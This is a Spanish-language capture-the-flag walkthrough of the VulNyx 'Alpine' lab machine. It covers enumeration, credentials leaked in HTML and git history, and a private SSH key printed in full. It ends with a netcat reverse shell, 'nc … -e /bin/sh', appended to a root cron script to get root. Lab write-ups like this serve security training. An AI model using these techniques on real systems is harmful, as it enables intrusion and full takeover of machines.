VulNyx - Alpine
Information
Alpine es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario Soraya y funciona correctamente en el hipervisor VirtualBox.
Enumeration
Nmap
TCP
root@kali:~ ❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.73
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 10:31 CET
Nmap scan report for 192.168.1.73
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
root@kali:~ ❯ nmap -sVC -p22,80 192.168.1.73
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 10:32 CET
Nmap scan report for 192.168.1.73
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://alpine.nyx/
|_http-server-header: Apache/2.4.66 (Unix)
Shell (developer)
80/TCP (HTTP)
Site
En el nmap inicial y en el sitio web, se puede ver que existe un redirect al dominio alpine.nyx
(Agrego el dominio encontrado alpine.nyx a mi archivo /etc/hosts para futuros ataques)
|_http-title: Did not follow redirect to http://alpine.nyx/
VHOST Site (/)
Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://alpine.nyx -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://alpine.nyx
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 12461]
/login.html (Status: 200) [Size: 3182]
/profile.html (Status: 200) [Size: 9571]
/booking.html (Status: 200) [Size: 3217]
/server-status (Status: 403) [Size: 313]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================
VHOST Site (/login.html)
En el código de la página encontré las credenciales testuser:WinterIsComing! dentro de un comentario HTML.
En el panel de login accedo exitosamente con las credenciales obtenidas y encuentro un dashboard
En la sección Settings de la sidebar encuentro las credenciales developer:SummerVibes2024! para SSH
22/TCP (SSH)
Valido credenciales y accedo al sistema como usuario developer
root@kali:~ ❯ netexec ssh 192.168.1.73 -u 'developer' -p 'SummerVibes2024!'
SSH 192.168.1.73 22 192.168.1.73 [*] SSH-2.0-OpenSSH_10.2
SSH 192.168.1.73 22 192.168.1.73 [+] developer:SummerVibes2024! Linux - Shell access!
root@kali:~ ❯ sshpass -p 'SummerVibes2024!' ssh developer@192.168.1.73 -o StrictHostKeyChecking=no
Warning: Permanently added '192.168.1.73' (ED25519) to the list of known hosts.
Welcome to Alpine!
The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.
You can setup the system with the command: setup-alpine
You may change this message by editing /etc/motd.
developer@alpine:~$ id ; hostname
uid=1000(developer) gid=1000(developer) groups=1000(developer)
alpine
Shell (sysadmin)
Enumeration
Files
Encuentro un archivo README.txt con un hint que hace referencia a Git
developer@alpine:~$ cat README.txt
=== SnowPeak Development Notes ===
Hi Developer,
Welcome to the SnowPeak development environment!
IMPORTANT REMINDERS:
1. The sysadmin user manages the webapp code in their directory
2. We use git as a deployment pipeline
3. Don't forget to check the cleaners !
If you need elevated access, contact sysadmin.
- Management
Git
Dentro de la carpeta webapp, ubicada en el home del usuario sysadmin, encuentro un archivo .git
developer@alpine:/home/sysadmin/webapp$ ls -la
total 16
drwxr-xr-x 3 sysadmin sysadmin 4096 Dec 11 11:14 .
drwxr-sr-x 4 sysadmin sysadmin 4096 Dec 12 17:19 ..
drwxr-xr-x 7 sysadmin sysadmin 4096 Dec 11 11:14 .git
-rwxr-xr-x 1 sysadmin sysadmin 171 Dec 11 11:13 config.php
Commits
En uno de los commits encuentro una clave privada (id_rsa) de SSH
developer@alpine:/home/sysadmin/webapp$ git log --pretty=oneline | more
0c6ee270764eb91ee53afc9784881371d4dddd93 Remove backup
02f9a1879dbfa40703a6bcbd985e5a19542c24c8 Backup SSH keys before server migration
2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593 Initial commit: Add database config
developer@alpine:/home/sysadmin/webapp$ git --no-pager log -p 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
commit 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
Author: sysadmin <sysadmin@snowpeak.nyx>
Date: Thu Dec 11 11:13:53 2025 +0000
Backup SSH keys before server migration
diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
new file mode 100644
index 0000000..76b357a
--- /dev/null
+++ b/.ssh-backup/id_rsa
@@ -0,0 +1,27 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
+NhAAAAAwEAAQAAAQEA3ZnZAOyE5gZN5QxDnRnYnRfXHwCavg4mJz2HbUWI7p3lGi+tdL6u
+IbqPyjqbH69DcyQCubvORi4domdpqTchLF7PyJlUBHVIo3AULC1kVhMqGvctWQxAgPRvr7
+zM7HGr+NpTPEkM/4BjfJToy706FGjfiXBhjkSiv5cHOlnXxhO44NkKSxvySnXkmYq3PNNF
+5OtjZJg+7+XrZKoUsaipupjOcZgsQCx1Yf1xE4gWIi/jS9kY07R0GtNdqaW2Z9UwXYGMFW
+xGKPtczHbRgcxtdP9ne71C/Zh5zsTPtgWWx8cO+P0N0emTYNDEMlD+4IH9AygBbnAzY978
+qc2jiRSxJwAAA8jbDUur2w1LqwAAAAdzc2gtcnNhAAABAQDdmdkA7ITmBk3lDEOdGdidF9
+cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQE
+dUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lw
+c6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYi
+L+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q
+3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEnAAAAAwEAAQAAAQAlkP0uoOnurMbru2aC
+7WzBRNddFBcnfPKO2Glq5szN1sqN4+M91U1jvmK9362Ic4e1rzcfEW1ojEzNyUYqP4RKJ1
+CGKygJEXDc9BUXYCKQTPNoWtq/K8qLkeSVICaFNsf2idxubdvcPIGhDwVf9JYx+41ZmUmQ
+eqY0YIADLlPb6g8z0Cgr0cEQg9PEBUi5FZAhji0hIz9k7BAfAzBaed94y+IPF0gG8AtsRm
+oo9XlqTuiphbkNyTVPzE9mKoqR8pECqSLAcx5+YBFP6tOoKh1BwHqWBG5ixw3fWi2HvgPv
+WeVRTozvXzjP1fVlYi/KyayuOLuiwQrlWvtkXwB4S3cRAAAAgEoibXJoCwzdf1naZQ4yZr
+aHnU5Mkx1XsO3X2bWXdIRZzQuLjAlmbwjQyMRWkiRb12D2uc1LwwQ1lzlBOqnCRXjFpM28
+/M8V6ZwYMP5bJeOGJSKEaikzY7blksM2Pls2P8zuhLiL3DnvQlB/7whKfME2MwH4tBDYTO
+7mS6MbKIElAAAAgQD1zPzaJsyt7gAjYgn/v0Wzj7HfVlLqeLR8TGup5MP8uDq6IJV5pLkf
+S8I4dGTOfrhgTw4VNbwy/BZNZErVnKa+zt6EsHgSqFub5ZVgpwRWx6bkk7lKPikZ62uNye
+gtqE7uJVBu12Li4kWuzyF2/IhcSh1Sp9B7fnF6p5b+t1H84wAAAIEA5svMbW9WTDB5hvgo
+ii5H6OZuIPGNKeEndKVquBeLjKR2QQrK9KQ0d/OgIu4ioEOmQ+NA1tWKr5uXJ4hdBvDCoS
+4tqjiIBNSTx1qkV6tpcbKDaIjTzdCvAJ8wOMymShOVVJkmXvgIsJuydR7OQ+StvR0DRDGp
+rkFejyhcyFIbke0AAAARc3lzYWRtaW5Ac25vd3BlYWsBAg==
+-----END OPENSSH PRIVATE KEY-----
commit 2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593
Author: sysadmin <sysadmin@snowpeak.nyx>
Date: Thu Dec 11 11:13:26 2025 +0000
Initial commit: Add database config
diff --git a/config.php b/config.php
new file mode 100644
index 0000000..daa9acc
--- /dev/null
+++ b/config.php
@@ -0,0 +1,7 @@
+<?php
+// Database Configuration
+define('DB_HOST', 'localhost');
+define('DB_USER', 'webapp_user');
+define('DB_PASS', 'temp_password');
+define('DB_NAME', 'snowpeak_db');
+?>
developer@alpine:/home/sysadmin/webapp$ git --no-pager show 02f9a1879dbfa40703a6bcbd985e5a19542c24c8:.ssh-backup/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA3ZnZAOyE5gZN5QxDnRnYnRfXHwCavg4mJz2HbUWI7p3lGi+tdL6u
IbqPyjqbH69DcyQCubvORi4domdpqTchLF7PyJlUBHVIo3AULC1kVhMqGvctWQxAgPRvr7
zM7HGr+NpTPEkM/4BjfJToy706FGjfiXBhjkSiv5cHOlnXxhO44NkKSxvySnXkmYq3PNNF
5OtjZJg+7+XrZKoUsaipupjOcZgsQCx1Yf1xE4gWIi/jS9kY07R0GtNdqaW2Z9UwXYGMFW
xGKPtczHbRgcxtdP9ne71C/Zh5zsTPtgWWx8cO+P0N0emTYNDEMlD+4IH9AygBbnAzY978
qc2jiRSxJwAAA8jbDUur2w1LqwAAAAdzc2gtcnNhAAABAQDdmdkA7ITmBk3lDEOdGdidF9
cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQE
dUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lw
c6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYi
L+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q
3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEnAAAAAwEAAQAAAQAlkP0uoOnurMbru2aC
7WzBRNddFBcnfPKO2Glq5szN1sqN4+M91U1jvmK9362Ic4e1rzcfEW1ojEzNyUYqP4RKJ1
CGKygJEXDc9BUXYCKQTPNoWtq/K8qLkeSVICaFNsf2idxubdvcPIGhDwVf9JYx+41ZmUmQ
eqY0YIADLlPb6g8z0Cgr0cEQg9PEBUi5FZAhji0hIz9k7BAfAzBaed94y+IPF0gG8AtsRm
oo9XlqTuiphbkNyTVPzE9mKoqR8pECqSLAcx5+YBFP6tOoKh1BwHqWBG5ixw3fWi2HvgPv
WeVRTozvXzjP1fVlYi/KyayuOLuiwQrlWvtkXwB4S3cRAAAAgEoibXJoCwzdf1naZQ4yZr
aHnU5Mkx1XsO3X2bWXdIRZzQuLjAlmbwjQyMRWkiRb12D2uc1LwwQ1lzlBOqnCRXjFpM28
/M8V6ZwYMP5bJeOGJSKEaikzY7blksM2Pls2P8zuhLiL3DnvQlB/7whKfME2MwH4tBDYTO
7mS6MbKIElAAAAgQD1zPzaJsyt7gAjYgn/v0Wzj7HfVlLqeLR8TGup5MP8uDq6IJV5pLkf
S8I4dGTOfrhgTw4VNbwy/BZNZErVnKa+zt6EsHgSqFub5ZVgpwRWx6bkk7lKPikZ62uNye
gtqE7uJVBu12Li4kWuzyF2/IhcSh1Sp9B7fnF6p5b+t1H84wAAAIEA5svMbW9WTDB5hvgo
ii5H6OZuIPGNKeEndKVquBeLjKR2QQrK9KQ0d/OgIu4ioEOmQ+NA1tWKr5uXJ4hdBvDCoS
4tqjiIBNSTx1qkV6tpcbKDaIjTzdCvAJ8wOMymShOVVJkmXvgIsJuydR7OQ+StvR0DRDGp
rkFejyhcyFIbke0AAAARc3lzYWRtaW5Ac25vd3BlYWsBAg==
-----END OPENSSH PRIVATE KEY-----
22/TCP (SSH)
Accedo al sistema como usuario sysadmin con la id_rsa obtenida
root@kali:~ ❯ chmod 600 id_rsa
root@kali:~ ❯ ssh -i id_rsa sysadmin@192.168.1.73
Welcome to Alpine!
The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.
You can setup the system with the command: setup-alpine
You may change this message by editing /etc/motd.
sysadmin@alpine:~$ id ; hostname
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
alpine
Privilege Escalation
Enumeration
Cron
En el directorio /opt/scripts/ existe el script cleanup.sh, sobre el cual dispongo de permisos de escritura
También se puede observar que el script es ejecutado por el usuario root cada un minuto
sysadmin@alpine:~$ ls -la /opt/scripts/
total 20
drwxr-xr-x 2 root root 4096 Dec 13 13:06 .
drwxr-xr-x 3 root root 4096 Dec 11 11:23 ..
-rwxrwxr-x 1 root sysadmin 284 Dec 13 13:04 cleanup.sh
sysadmin@alpine:~$ cd /opt/scripts/
sysadmin@alpine:/opt/scripts$ echo "whoami > \"/opt/scripts/\$(date +'%H-%M-%S').txt\"" >> cleanup.sh
sysadmin@alpine:/opt/scripts$ ls -la | grep ".txt"
-rw-r--r-- 1 root root 5 Dec 13 13:05 13-05-00.txt
-rw-r--r-- 1 root root 5 Dec 13 13:06 13-06-00.txt
-rw-r--r-- 1 root root 5 Dec 13 13:07 13-07-00.txt
Abuse
Agrego una reverse shell en el script cleanup.sh
sysadmin@alpine:/opt/scripts$ echo 'nc 192.168.1.5 443 -e /bin/sh' >> cleanup.sh
Obtengo la shell como usuario root
root@kali:~ ❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.73] 41867
id ; hostname
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
alpine
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
30a*****************************
6b7*****************************
Hasta aquí la resolución de la máquina Alpine.
Happy Hacking!